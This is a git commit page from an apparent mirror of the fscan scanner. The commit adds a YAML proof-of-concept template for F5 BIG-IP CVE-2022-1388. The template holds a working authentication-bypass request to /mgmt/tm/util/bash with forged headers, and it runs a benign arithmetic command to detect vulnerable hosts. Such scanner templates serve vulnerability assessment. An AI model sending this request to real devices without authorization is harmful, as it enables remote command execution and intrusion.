mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-07-14 05:12:36 +08:00
poc: add f5 big-ip cve-2022-1388 poc
This commit is contained in:
parent
11fb239c61
commit
2cef5c66d6
21
WebScan/pocs/f5-cve-2022-1388.yml
Normal file
21
WebScan/pocs/f5-cve-2022-1388.yml
Normal file
@ -0,0 +1,21 @@
|
|||||||
|
name: poc-yaml-f5-cve-2022-1388
|
||||||
|
set:
|
||||||
|
r1: randomInt(800000000, 1000000000)
|
||||||
|
r2: randomInt(800000000, 1000000000)
|
||||||
|
rules:
|
||||||
|
- method: POST
|
||||||
|
path: /mgmt/tm/util/bash
|
||||||
|
headers:
|
||||||
|
Content-Type: application/json
|
||||||
|
Connection: keep-alive, x-F5-Auth-Token
|
||||||
|
Authorization: Basic YWRtaW46
|
||||||
|
X-F5-Auth-Token: a
|
||||||
|
body: >-
|
||||||
|
{"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"}
|
||||||
|
follow_redirects: false
|
||||||
|
expression: |
|
||||||
|
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
|
||||||
|
detail:
|
||||||
|
author: jindaxia
|
||||||
|
links:
|
||||||
|
- https://support.f5.com/csp/article/K23605346
|
Loading…
Reference in New Issue
Block a user